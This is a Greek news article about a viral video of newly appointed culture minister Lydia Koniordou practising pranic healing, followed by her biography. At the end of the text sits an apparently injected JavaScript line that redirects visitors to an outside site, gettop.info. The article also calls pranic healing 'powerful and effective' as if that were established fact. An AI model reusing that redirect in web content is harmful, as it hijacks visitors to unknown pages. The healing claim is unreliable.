«Σπάει» ταμεία βίντεο που δείχνει τη Λυδία Κονιόρδου, να κάνει μάθημα ενεργειακής θεραπείας

0
34

 

Σάλος έχει προκληθεί μετά την επιλογή της Λυδίας Κονιόρδου στη θέση της υπουργού Πολιτισμού με ένα βίντεο που έχει γίνει viral και δείχνει την νέα υπουργό να πραγματοποιεί ενεργειακή θεραπεία.

H Λυδία Κονιόρδου, εκτός από τις υποκριτικές της ικανότητες, φημίζεται και για τις ικανότητες της στο Pranic Healing ή αλλιώς… Μάθημα Ενεργειακής Θεραπείας.

Το Pranic Healing είναι ένα απλό, αλλά ιδιαίτερα ισχυρό και αποτελεσματικό no-touch σύστημα ενεργειακής θεραπείας που αναπτύχθηκε απ’τον Grand Master Chloa Kok Sui και διδάσκει πως να διαχειρίζεστε τις φυσικές πηγές ζωτικής ενέργειας ή prana.

Στο βίντεο λοιπόν η νέα υπουργός Πολιτισμού επιδίδεται σε pranic healing…

https://youtu.be/dY5azI3Awic

Η Λυδία Κονιόρδου μετείχε στο ψηφοδέλτιο Επικρατείας του ΣΥΡΙΖΑ στις εκλογές της 20ης Σεπτεμβρίου 2015.

Στις ευρωεκλογές του 2014 ήταν υποψήφια ευρωβουλετής του κόμματος των Οικολόγων Πρασίνων.

Γεννήθηκε το 1953, σπούδασε Αγγλική Φιλολογία στο Πανεπιστήμιο Αθηνών. Το 1977 αποφοίτησε από τη Δραματική Σχολή του Εθνικού Θεάτρου. Έγινε γνωστή στο πανελλήνιο με τις σπουδαίες ερμηνείες της στην αρχαία τραγωδία με το Θεσσαλικό Θέατρο του Κώστα Τσιάνου.

Υπήρξε, μεταξύ άλλων, ιδρυτικό μέλος του «Θεάτρου της Άνοιξης» και σημαίνον στέλεχος του Κέντρου Έρευνας – Πρακτικών Εφαρμογών του Αρχαίου Ελληνικού Δράματος «Δεσμοί», της Ασπασίας Παπαθανασίου. Έχει διατελέσει καλλιτεχνική διευθύντρια του ΔΗΠΕΘΕ Πάτρας, Βόλου.

Εκτός από τη μεγάλη θεατρική δράση της στην Ελλάδα και το εξωτερικό, η Λυδία Κονιόρδου έχει επίσης πλούσιο διδακτικό έργο σε ιδιωτικές σχολές και στη Δραματική Σχολή του Εθνικού Θεάτρου, καθώς επίσης και στο Τμήμα Θεάτρου της Σχολής Καλών Τεχνών του ΑΠΘ. Έχει βραβευθεί για τις ερμηνείες της, αλλά και την συνολική προσφορά της στο αρχαίο ελληνικό δράμα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here